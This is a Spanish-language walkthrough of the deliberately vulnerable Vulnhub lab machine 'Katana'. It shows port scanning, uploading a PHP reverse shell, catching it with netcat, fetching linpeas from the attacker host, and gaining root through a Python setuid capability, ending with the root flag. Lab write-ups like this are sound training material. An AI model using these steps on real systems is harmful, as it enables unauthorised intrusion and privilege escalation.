[VLN] Katana

Hoy vamos a hackear la maquina de Vulnhub llamada Katana. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/katana-1,482/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@m0nique:~$ nmap -A -p- 192.168.112.129 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 17:26 CEST Nmap scan report for katana.home (192.168.1.119) Host is up (0.0011s latency). Not shown: 65527 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA) | 256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA) |_ 256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Katana X 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) 7080/tcp open ssl/http LiteSpeed httpd |_http-server-header: LiteSpeed |_http-title: Katana X | ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US | Not valid before: 2020-05-11T13:57:36 |_Not valid after: 2022-05-11T13:57:36 |_ssl-date: 2020-05-16T15:26:44+00:00; 0s from scanner time. | tls-alpn: | h2 | spdy/3 | spdy/2 |_ http/1.1 8088/tcp open http LiteSpeed httpd |_http-server-header: LiteSpeed |_http-title: Katana X 8715/tcp open http nginx 1.14.2 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=Restricted Content |_http-server-header: nginx/1.14.2 |_http-title: 401 Authorization Required Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h00m00s, deviation: 2h00m00s, median: 0s |_nbstat: NetBIOS name: KATANA, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian) | Computer name: katana | NetBIOS computer name: KATANA\x00 | Domain name: \x00 | FQDN: katana |_ System time: 2020-05-16T11:26:41-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-16T15:26:40 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.89 seconds
    Vemos que tiene varios puertos abiertos, tras investigar, profundizamos en el puerto 8088 a ver si encontramos algo interesante.
    sml@m0nique:~$ gobuster dir -u http://192.168.112.129:8088 -w /usr/share/wordlists/dirb/big.txt -x txt,php,html =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.112.129:8088 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt,php,html [+] Timeout: 10s =============================================================== 2020/05/22 23:03:06 Starting gobuster =============================================================== /.htaccess (Status: 403) /blocked (Status: 301) /cgi-bin (Status: 301) /css (Status: 301) /docs (Status: 301) /error404.html (Status: 200) /img (Status: 301) /index.html (Status: 200) /phpinfo.php (Status: 200) /protected (Status: 301) /upload.php (Status: 200) /upload.html (Status: 200) =============================================================== 2020/05/22 23:03:12 Finished ===============================================================
    Vemos que aparece una pagina llamada upload.html, la cual resulta interesante. Tras verla, nos permite subir ficheros. Al subir los ficheros los renombra. Si luego usamos gobuster para buscar el nombre del nuevo fichero vemos que lo tenemos en http://192.168.112.129:8715/.
  • Exploitation
  • En http://192.168.112.129:8715/ nos tenemos que loguear previamente usando admin/admin :) Asi que sabiendo esto, preparamos nuestra reverse-shell y la editamos para que apunte hacia nuestra maquina.
    sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php . sml@m0nique:~$ mv php-reverse-shell.php shelli.php sml@m0nique:~$ nano shelli.php
    La subimos a: http://192.168.112.129:8088/upload.html El resultado que nos da es:
    File : file1 Name : reshell.php Type : application/x-php Path : /tmp/phpJMsNlv Size : 5494 Please wait for 1 minute!. Please relax!. Moved: /tmp/phpJMsNlv ====> /opt/manager/html/katana_shelli.php MD5 : ad5545baba3150a5e5339ab720777fd4 Size : 5494 bytes
    Vemos que ha renombrado nuestra reverse shell a katana_shelli.php. Ponemos nc a la escucha en nuestra maquina.
    sml@m0nique:~$ nc -nlvp 4444
    Y por ultimo visitamos http://192.168.112.129:8715/katana_reshell.php (Acordaros que antes que "visitar" vuestra shell hay que entrar en http://192.168.112.129:8715 y loguearos admin/admin).
  • Low Shell
  • sml@m0nique:~$ nc -nlvp 4444 listening on [any] 4444 ... connect to [192.168.112.128] from (UNKNOWN) [192.168.112.129] 36014 Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux 05:04:56 up 14 min, 0 users, load average: 0.05, 0.08, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
    Estamos dentro, ahora exploramos el sistema :)
    $ python -c 'import pty; pty.spawn("/bin/sh")' $ cd /home $ ls katana $ cd katana $ ls -la total 32 drwxr-xr-x 4 katana katana 4096 May 21 05:04 . drwxr-xr-x 3 root root 4096 May 11 09:33 .. -rw-r--r-- 1 katana katana 220 May 11 09:33 .bash_logout -rw-r--r-- 1 katana katana 3526 May 11 09:33 .bashrc drwx------ 3 katana katana 4096 May 11 11:57 .gnupg -rw-r--r-- 1 katana katana 807 May 11 09:33 .profile drwxrwxrwx 2 katana katana 4096 May 16 15:28 .ssh -rw-r--r-- 1 root root 19 May 11 11:52 .ssh_passwd $ cat .ssh_passwd katana@katana12345
    Parece la password del usuario katana, probamos...
    $ su katana Password: katana12345 python -c 'import pty; pty.spawn("/bin/sh")' $
    Ahora que estamos como usuario "katana" nos descargamos linpeas.sh desde nuestra maquina para explorar mas en detalle el sistema y ver como podemos escalar los privilegios.
    $cd /tmp $ wget http://192.168.112.128/linpeas.sh $ sh linpeas.sh
    De la salida de linpeas, la parte que nos interesa es:
    [+] Capabilities [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities /usr/bin/ping = cap_net_raw+ep /usr/bin/python2.7 = cap_setuid+ep
    Vemos que python2.7 tiene cap_setuid, lo que nos permitira escalar privilegios...
  • Privilege Escalation
  • $ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' # id id uid=0(root) gid=1000(katana) groups=1000(katana),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev) ,109(netdev)
  • root.txt
  • # cd /root cd /root # ls ls root.txt # cat root.txt cat root.txt {R00t_key_Katana_91!}
  • End
  • Y con esto ya seriamos root de la maquina :)